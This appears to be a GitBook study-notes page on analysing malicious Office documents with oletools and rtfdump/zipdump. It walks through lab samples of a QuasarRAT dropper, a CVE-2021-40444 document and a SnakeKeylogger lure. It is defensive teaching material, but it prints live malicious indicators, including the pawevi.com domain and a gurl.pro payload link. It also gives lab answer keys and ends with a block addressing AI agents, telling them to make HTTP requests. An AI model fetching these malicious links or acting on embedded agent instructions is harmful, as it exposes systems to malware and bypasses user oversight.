# Office Files Analysis

Analyzing malicious Office files is important because Office documents are common attack vectors due to their widespread use and support for macros and embedded objects. Understanding how these attacks work helps in developing effective defenses. Analysis can reveal specific techniques, tactics, and procedures (TTPs) used by threat actors, aiding in attribution and understanding the threat landscape.

## Common Attacks Using Malicious Office Files

Malicious Office documents, such as Word or Excel files, are commonly used by attackers to deliver malware. These files may contain malicious macros, embedded objects, or exploit vulnerabilities to execute code, often as part of phishing campaigns. Analyzing them requires a structured approach to uncover the following techniques:

* **Macro-Based Attacks**: Malicious macros run when enabled by the user, often downloading further payloads.
* **Embedded Objects**: Objects like OLE or ActiveX controls may execute code without user awareness.
* **Exploiting Vulnerabilities**: Crafted documents can exploit flaws in Office applications, such as buffer overflows.
* **Phishing & Social Engineering**: Documents are used to deceive users into enabling macros or clicking malicious links.

## Macros

Macros in Microsoft Office automate repetitive tasks using commands written in Visual Basic for Applications (VBA), a Microsoft-supported language across all Office products.

Office Open XML (OOXML) files such as `.docx`, `.xlsx`, and `.pptx` cannot store macros by default. Only specific file formats can contain VBA macros, such as:

* `Word`: .docm, .dotm
* `Excel`: .xlsm, .xltm
* `PowerPoint`: .pptm, .potm

These file formats end with an 'm' to indicate the presence of macros, which may contain executable code. Users can rename the extension, but if macros are present, a security warning will state: "Macros have been disabled."

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F91AsK3rwus3Ozd6QZKJ0%2Foffice-4_.webp?alt=media&#x26;token=684b24a3-06c0-4115-b070-44af0818c129" alt=""><figcaption></figcaption></figure>

Office documents, like PDFs, have their own scripting language—in this case, VBA (Visual Basic for Applications). VBA macros are powerful and can directly call Windows APIs, enabling actions like malware download and code execution. Attackers commonly use macros to:

* **Modify Files**: Change or delete system files.
* **Execute Code**: Run malicious scripts or binaries.
* **Deliver Payloads**: Fetch and launch malware from remote sources.

Analyzing macros is essential, as they are a common attack vector.

The easiest way to detect the presence of macros inside an Office file is by using the `oleid.py` Python utility followed by the document for analysis.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FPjY3ZD6Gt3VoskeSkvMf%2FScreenshot(36).png?alt=media&#x26;token=a09c854d-56fc-40dc-a464-f314babfeb87" alt=""><figcaption></figcaption></figure>

## Office File Formats

Office documents can be saved in various formats, with the most common being:

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FFbrTTX7JBxZGfBQc5EHV%2Foffice-files.webp?alt=media&#x26;token=fe60bebf-b817-4b48-bfa7-4c8132f8b4d9" alt=""><figcaption></figcaption></figure>

The Python script `oledir` helps in showing the layout of an OLE file.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oledir.py C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FKUiUdas2SJOPnp9QIGYf%2FScreenshot(37).png?alt=media&#x26;token=f4d8141f-1be0-46ab-807a-58455bb4a131" alt=""><figcaption></figcaption></figure>

Despite the lack of macro support, RTF files can still be used in attacks through embedded objects (such as OLE1 objects), binary contents, or exploits targeting vulnerabilities in RTF parsers.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\xworm\sample.rtf
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fyh3ql6DAS7gRq5sVzBKx%2FScreenshot(38).png?alt=media&#x26;token=41c71007-2925-4f77-982a-87c9107bc9ee" alt=""><figcaption></figcaption></figure>

For detailed analysis, we will use the `rtfdump.py` Python utility, which can be downloaded from the official GitHub [repository](https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py). This utility can be executed inside the target (VM) at the following path:

```bash
python C:\Tools\MalDoc\Office\Tools\DidierStevensSuite\rtfdump.py C:\Tools\Maldoc\Office\Demo\Samples\xworm\sample.rtf
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FcREVAk4Ez9xQsxLWguMN%2FScreenshot(39).png?alt=media&#x26;token=0c56ce07-f4ef-4556-9f3c-e0801239e3e1" alt=""><figcaption></figcaption></figure>

## Questions

Q1) Run `olevba.py` with `-a` option on the file "C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx". This will show a list of suspicious keywords. Figure out the keyword that downloads files from the Internet. Type the keyword as your answer. Answer Format is m\*\*\*\*\*\*\*\*.\*\*\*\*\*\*\*

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py -a C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F6ulqgPAP5Klz7S8N8zBV%2FScreenshot(40).png?alt=media&#x26;token=1468163b-4bca-49c4-9382-9d3ad1977211" alt=""><figcaption></figcaption></figure>

Answer:  `microsoft.xmlhttp`&#x20;

## Office Document - VBA Macro Analysis

Let's start with the MS Office document format first. To get started, let's review the different file types that we know.

| File Type     | Description                                       |
| ------------- | ------------------------------------------------- |
| doc           | Microsoft Word document before Word 2007          |
| docm          | Microsoft Word macro-enabled document             |
| docx          | Microsoft Word document (Open XML format, Latest) |
| dot/dotx/dotm | Word template files.                              |

Initially, when we don't know about a file type, we can extract some basic information about the sample using `trid.exe`. This will provide us with the information related to what kind of sample we're dealing with.

```bash
trid C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FS8DsP6qu1FqN0nT7B3na%2FScreenshot(41).png?alt=media&#x26;token=bac975fb-3537-4b07-92cc-ecd5711c2bb7" alt=""><figcaption></figcaption></figure>

The output indicates that it is a DOC file and also contain an OLE object. We can use `olemeta.py`, which is a script to parse OLE files such as MS Office documents (e.g., Word, Excel). This script extracts all standard properties present in the OLE file.

```bash
python c:\tools\maldoc\office\tools\oletools\olemeta.py  C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FbG9fTbQbtPerrx2nc9AD%2FScreenshot(42).png?alt=media&#x26;token=40917ac3-81e6-4c47-8e46-150a50453729" alt=""><figcaption></figcaption></figure>

To get the timestamp information, we can use the `oletimes.py` Python script

```bash
python C:\tools\maldoc\office\tools\oletools\oletimes.py  C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FQaw5zO5WJ3OUJ7y7SksI%2FScreenshot(44).png?alt=media&#x26;token=49194d03-0369-47e1-911e-e1b80cc16056" alt=""><figcaption></figcaption></figure>

Next, we can use `oleid.py` to get more information related to the sample.

```bash
python C:\tools\maldoc\office\tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FpqOIX4UThJyksZ3V0TOV%2FScreenshot(45).png?alt=media&#x26;token=8bf85663-8437-4ba9-b407-2f72384edfc1" alt=""><figcaption></figcaption></figure>

We can see there are `VBA macros` present. Let us check this using the `olevba` utility. This script is used to open a MS Office file, detect if it contains VBA macros, and extract and analyze the VBA source code from your own Python applications.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FQaTAsXUTaGtbMSE2XL9n%2FScreenshot(46).png?alt=media&#x26;token=5fe1cadc-c619-4c71-837a-c1965613844a" alt=""><figcaption></figcaption></figure>

## Questions

Q1) Use `olemeta.py` to analyse the document properties. Find out who is the author of this document, and type the name of author as your answer.

```bash
python c:\tools\maldoc\office\tools\oletools\olemeta.py  C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F64OZhHVzVzN6qV2pVE1T%2FScreenshot(6).png?alt=media&#x26;token=721af9a2-62f8-42be-a9fe-fb3063ad4a71" alt=""><figcaption></figcaption></figure>

Answer:  `Mohammed Alkuwari`

## Obfuscated VBA Macro Analysis

In this section, we'll analyze another sample, which is little more complicated and a heavily obfuscated malicious document that drops `QuasarRAT` malware on the system. We'll take a sample renamed as [QuasarRAT.docx](https://www.virustotal.com/gui/file/ba3324366a76daea76cb9a0d78c5367085091ec5efa75eb41120d66cee286881/detection), which is tagged under the malware family (signature) of `QuasarRAT`, `xRAT`. The details related to this sample are as follows:

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F8vmvCUSLQmzKdxj7SvKU%2FScreenshot(7).png?alt=media&#x26;token=2ae0b905-afc6-4aa4-be72-eef9a4e9db36" alt=""><figcaption></figcaption></figure>

Next, we can run the `olevba` Python utility to extract more details related to the macro in the document.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FzrWjyAZFtcsFyq7OsH64%2FScreenshot(8).png?alt=media&#x26;token=0bd12144-883a-4252-b402-771d569ad927" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F7tenVKU3K4RcH0Oy3x10%2FScreenshot(10).png?alt=media&#x26;token=0ce56c3f-3613-4939-943f-93ed468b34cd" alt=""><figcaption></figcaption></figure>

We can see the use of the `AutoExec` function to trigger code execution when a user opens the document.

Despite obfuscation, the script's use of VBA functions like `CreateObject`, `Open`, `Write`, and `SaveToFile` reveals its role as a dropper. It downloads a QuasarRAT payload from an external source, writes it to disk, and executes it—demonstrating typical dropper behavior used to deploy additional malware.

## Questions

Q1) When you extract VBA Macro code of this sample using olevba.py, there is a call to MsgBox. What is the content of this MsgBox function? Type it as your answer.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Ff1eBzeFzp7g14pv2HSov%2FScreenshot(11).png?alt=media&#x26;token=b588c75e-c2bf-411e-8314-b04be15a84ef" alt=""><figcaption></figcaption></figure>

Answer:  `Open this Transaction Recipt Again!`&#x20;

## Analysis of External Relationships

Adversaries have exploited remote code execution vulnerabilities in Office documents, such as `CVE-2021-40444`, which leveraged a malicious ActiveX control in MSHTML to deliver Cobalt Strike Beacon loaders linked to ransomware campaigns. This section explores such malicious Office document tactics.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FjHiwOdwfCkPheKdByVr4%2Fmshtml-flow.webp?alt=media&#x26;token=137526ae-f49c-4f9c-aa6d-69e557beba9a" alt=""><figcaption></figcaption></figure>

Microsoft states that files from external sources are usually tagged with a Mark of the Web (`MoTW`), which triggers Protected View and requires user action to enable active content. However, this document bypasses that protection and executes its payload automatically upon opening, without MoTW or user interaction.

This vulnerability is triggered simply by opening a document—no user interaction, such as clicking 'Enable Content', is required. It can also impact other MSHTML-based applications like Skype, Outlook, and Visual Studio.

Let's begin our analysis by examining the `App-description.docx` document and scrutinizing the output from `oleid.py`.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F5drqKxEnyz7GPXg0neHK%2FScreenshot(12).png?alt=media&#x26;token=a44d7670-9999-49a0-b4ba-737425bbd605" alt=""><figcaption></figcaption></figure>

As suggested in the above output in the screenshot, we can use `oleobj` to obtain the external relationship directly as shown below:

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleobj.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FNsQmq0KTg7IjwEu0zRuP%2FScreenshot(13).png?alt=media&#x26;token=e26bc97e-408b-4631-924d-431124568071" alt=""><figcaption></figcaption></figure>

It is really good to get the external relationship and details of the `suspicious URL` directly in no time by using `oleobj.py`. However, we should also be aware of the whole process, such as where the relationship is stored and how to extract it using some more useful tools and scripts.

```bash
python zipdump.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FC00BeCE8maHNXrESSgnQ%2FScreenshot(14).png?alt=media&#x26;token=5c56a31f-9cb5-47fd-9310-a3bfaf9ae824" alt=""><figcaption></figcaption></figure>

Zipdump has an option to dump all content of the file using the `--dumpall` parameter. This is really important as we can search through it.

```powershell
python zipdump.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx --dumpall
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FliZY4ERoSqau8ArA5OMw%2FScreenshot(15).png?alt=media&#x26;token=e90a2f84-436b-4a03-9f33-4418c0594e96" alt=""><figcaption></figcaption></figure>

The content reveals a wealth of information. To identify specific patterns, we'll use the `re-search.py` script, which applies regular expressions to search files. It supports both custom regex and predefined patterns from a built-in library, specified using the `regex` argument.

```bash
python zipdump.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx --dumpall | python re-search.py --name url
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FTm2JCCBUr0SlcxGDSfKg%2FScreenshot(16).png?alt=media&#x26;token=39474124-08a8-4951-b246-9a0272c9c37f" alt=""><figcaption></figcaption></figure>

At the end of the output, there's a match for an external URL that is suspicious.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FtpijPVhDxj3kiUdTXrjy%2FScreenshot(17).png?alt=media&#x26;token=89822f21-f029-457a-88d4-ad894c747cb6" alt=""><figcaption></figcaption></figure>

We can also perform a [Yara](https://yara.readthedocs.io/en/latest/) search in the whole document. YARA, which stands for "Yet Another Recursive Acronym," is an open-source pattern-matching Swiss army knife that identifies patterns within files, making it a powerful tool for malware detection.

Zipdump supports the functionality to perform searches using YARA rules with files, directories, and direct strings as well. We'll use the YARA string search option to search for this domain using `--yara "#s#pawevi.com"`. This should tell us which file contains this suspicious string.

```bash
python zipdump.py --yara "#s#pawevi.com" C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fyp2t3M308iTFMahrrNn5%2FScreenshot(18).png?alt=media&#x26;token=e918b71e-080a-4bda-b06d-2d112ba0090a" alt=""><figcaption></figcaption></figure>

The output shows that this string is present in the relationships file with index 18. Let's open this index 18 relationship file using `--select 18` along with the `--dumpall` or `-d` option to show the dump file content.

```bash
python zipdump.py --select 18 --dumpall C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx | python xmldump.py pretty
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FBXsPnVEX73N3azp2CUUO%2FScreenshot(20).png?alt=media&#x26;token=298a472b-4cfc-4dc4-aa5c-cf4cdd994e28" alt=""><figcaption></figcaption></figure>

## **Questions**

Q1) Locate the sample "C:\Tools\MalDoc\Office\Demo\Samples\SnakeKeylogger\PO026037.docx" and investigate relationships with external links. Type the external link as your answer. Answer format is an HTTP URL.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleobj.py C:\Tools\MalDoc\Office\Demo\Samples\SnakeKeylogger\PO026037.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FsdXFv4fyEOq3Ql3apP9P%2FScreenshot(21).png?alt=media&#x26;token=bbb767d3-4763-47e9-a075-d26ba7a8a6ee" alt=""><figcaption></figcaption></figure>

Answer:  `http://gurl.pro/u8-drp`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://faresbltagy.gitbook.io/footprintinglabs/malicious-document-analysis-htb-notes/office-files-analysis.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
